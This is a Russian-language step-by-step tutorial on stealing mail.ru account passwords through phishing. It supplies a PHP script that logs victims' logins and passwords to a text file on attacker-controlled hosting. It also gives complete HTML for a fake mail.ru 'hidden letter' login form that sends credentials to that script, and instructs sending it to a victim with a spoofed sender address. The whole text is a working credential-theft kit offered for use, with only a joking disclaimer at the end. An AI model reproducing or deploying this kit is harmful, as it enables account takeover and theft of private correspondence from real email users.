Взлом почты на mail.ru [СИ]

[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.

Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.

Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику, сами поймете.

Статья сгодится для новичков. Гуру просьба не читать :)

 

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.

* Только заранее убедитесь что хостинг поддерживает PHP

Можно зарегистрироваться на любом из этих:

nextmail.ru 
hobby.ru 
webrise.ru 
lapin.ru 
free.dl-hosting.ru 
hostow.net 
beplaced.ru 
777host.ru 
paltus.ru 
miraclehost.ru 
freebox.ru 
alfaspace.net 
k70.ru 
hosting.promostudio.ru 
chat.ru 
maxhost.ru 
nixup.com 
e2e.ru 
noka.ru 
newmail.ru 
boom.ru 
h15.ru 
hut.ru 
jino-net.ru 
pochta.ru 
unlimhost.ru 
onepage.ru 
by.ru 
sbn.bz 
yard.ru 
domainhosting.ru 
orthodoxy.ru 
webservis.ru 
ru-web.net 
activehost.ru 
househost.ru 
bestof.ru 
addr.ru 
hosting.dump.ru 
pesni.ru 
medbox.ru 
fatal.ru 
x5x.ru 
hopshot.com 
5gigs.com 
wagoo.com 
orgfree.com 
awardspace.com 
bobos.ca 
www.host.sk 
zportal.info 
spaceall.de 
3x.ro 
sretenie.ru 
dotgeek.org 
sevhosting.net 
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru 
chat.ru 
boom.ru 
by.ru

Зарегистрировали? - идем дальше!

Что нам нужно?

Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл).


PHP Код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранятьflock($f,2);fputs($f,$_GET['Login']."@"); #логинfputs($f,$_GET['Domain']); #доменfputs($f,";".$_GET['Password']."\n"); # парольflock($f,3);fclose($f);?><script>document.location.href="/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Рассмотрим скрипт поподробнее.


PHP Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.

  • Сохраним в файл mes.php и зальем на хостинг.
  • Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777.

Пожалуй с хостингом - все!

Приступим к самому письму, которое мы будем отправлять жертве на мыло.

 


Код Письма:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<brДля просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td> 
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>
<tr> 
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div

Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.

[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.

 

Теперь остается отправить жертве письмо, желательно с подменой адреса.

Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.

Если жертва клюнет на это, значит вам повезло :)

Узнать пароли вы сможете в файлике mail.txt.

 

[::.END.::]

Думаю все.

А уж как подойти ко взлому решать вам.

Спасибо за внимание!

Жду ваших отзывов чуть ниже этого текста.

А лучше уж ничего и никого не ломать ;)

До свидания и до встречи :)

 


Дата створення/оновлення: 25.05.2018

stop war in Ukraine

ukrTrident

stand with Ukraine